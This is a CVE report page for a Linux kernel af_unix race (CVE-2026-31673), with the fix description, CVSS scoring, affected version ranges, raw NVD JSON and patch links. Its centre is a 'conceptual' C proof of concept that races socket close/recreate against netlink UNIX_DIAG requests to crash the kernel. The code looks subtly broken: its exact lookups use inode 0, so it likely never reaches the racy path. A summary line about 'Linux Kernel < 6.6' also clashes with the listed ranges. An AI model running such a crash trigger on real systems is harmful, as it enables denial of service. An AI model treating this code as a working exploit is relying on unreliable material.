Security Vulnerability Report
CVE-2026-31673 CVSS 7.8 HIGH

Published: 2026-04-25 09:16:00
Last Modified: 2026-05-06 21:36:14
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

af_unix: read UNIX_DIAG_VFS data under unix_state_lock

Exact UNIX diag lookups hold a reference to the socket, but not to u->path. Meanwhile, unix_release_sock() clears u->path under unix_state_lock() and drops the path reference after unlocking.

Read the inode and device numbers for UNIX_DIAG_VFS while holding unix_state_lock(), then emit the netlink attribute after dropping the lock.

This keeps the VFS data stable while the reply is being built.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

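cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 3.3 up to, excluding, 6.6.136) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.7 up to, excluding, 6.12.83) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.13 up to, excluding, 6.18.24) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.19 up to, excluding, 6.19.14) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (for the specific affected versions, refer to each distribution's patch advisories)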

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-31673 (Conceptual)
 * This code attempts to trigger the race condition between
 * unix_release_sock and UNIX_DIAG_VFS parsing.
 * Compile: gcc -o poc_cve2026_31673 poc_cve2026_31673.c -lpthread
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <pthread.h>
#include <linux/netlink.h>
#include <linux/sock_diag.h>
#include <linux/unix_diag.h>

int sock_fd = -1;
volatile int running = 1;

// Thread 1: Continuously close and recreate the socket
void *thread_close(void *arg)
{
    struct sockaddr_un addr;

    while (running) {
        if (sock_fd != -1) {
            close(sock_fd);
            sock_fd = -1;
        }
        sock_fd = socket(AF_UNIX, SOCK_STREAM, 0);
        if (sock_fd < 0)
            continue;
        memset(&addr, 0, sizeof(addr));
        addr.sun_family = AF_UNIX;
        bind(sock_fd, (struct sockaddr *)&addr, sizeof(addr));
        usleep(100); // Tune timing to increase race window
    }
    return NULL;
}

// Thread 2: Send Netlink diagnostic requests
void *thread_diag(void *arg)
{
    int nl_sock;
    struct sockaddr_nl nl_addr;
    char buf[1024];
    struct nlmsghdr *nlh;
    struct unix_diag_req *req;

    nl_sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG);
    if (nl_sock < 0)
        return NULL;
    memset(&nl_addr, 0, sizeof(nl_addr));
    nl_addr.nl_family = AF_NETLINK;
    bind(nl_sock, (struct sockaddr *)&nl_addr, sizeof(nl_addr));

    while (running) {
        if (sock_fd < 0) {
            usleep(100);
            continue;
        }
        memset(buf, 0, sizeof(buf));
        nlh = (struct nlmsghdr *)buf;
        nlh->nlmsg_type = SOCK_DIAG_BY_FAMILY;
        nlh->nlmsg_flags = NLM_F_REQUEST;
        nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct unix_diag_req));
        req = (struct unix_diag_req *)NLMSG_DATA(nlh);
        req->sdiag_family = AF_UNIX;
        req->udiag_states = -1; // All states
        req->udiag_ino = 0;     // Match any (or try to match specific)
        req->udiag_show = UDIAG_SHOW_VFS | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
        sendto(nl_sock, buf, nlh->nlmsg_len, 0,
               (struct sockaddr *)&nl_addr, sizeof(nl_addr));
        usleep(50);
    }
    close(nl_sock);
    return NULL;
}

int main()
{
    pthread_t t1, t2;

    printf("[+] Starting PoC for CVE-2026-31673...\n");
    pthread_create(&t1, NULL, thread_close, NULL);
    pthread_create(&t2, NULL, thread_diag, NULL);
    sleep(10); // Run for 10 seconds
    running = 0;
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    if (sock_fd != -1)
        close(sock_fd);
    printf("[+] PoC finished. Check kernel logs for crashes.\n");
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31673", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-25T09:16:00.423", "lastModified": "2026-05-06T21:36:13.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: read UNIX_DIAG_VFS data under unix_state_lock\n\nExact UNIX diag lookups hold a reference to the socket, but not to\nu->path. Meanwhile, unix_release_sock() clears u->path under\nunix_state_lock() and drops the path reference after unlocking.\n\nRead the inode and device numbers for UNIX_DIAG_VFS while holding\nunix_state_lock(), then emit the netlink attribute after dropping the\nlock.\n\nThis keeps the VFS data stable while the reply is being built."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3", "versionEndExcluding": "6.6.136", "matchCriteriaId": "FAB12062-558C-4570-A908-D71195858ADA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0c739f3785f84af695952c2bac8be2f45082c9b8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/39897df386376912d561d4946499379effa1e7ef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/900a4e0910e98b8caef117d5df00471fa438dcf9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b9232421a77a649c9376c99fdfc8cb7f79cad34c", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bdf206e740bf2919d818f132c8c9cc7ed91d11c0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}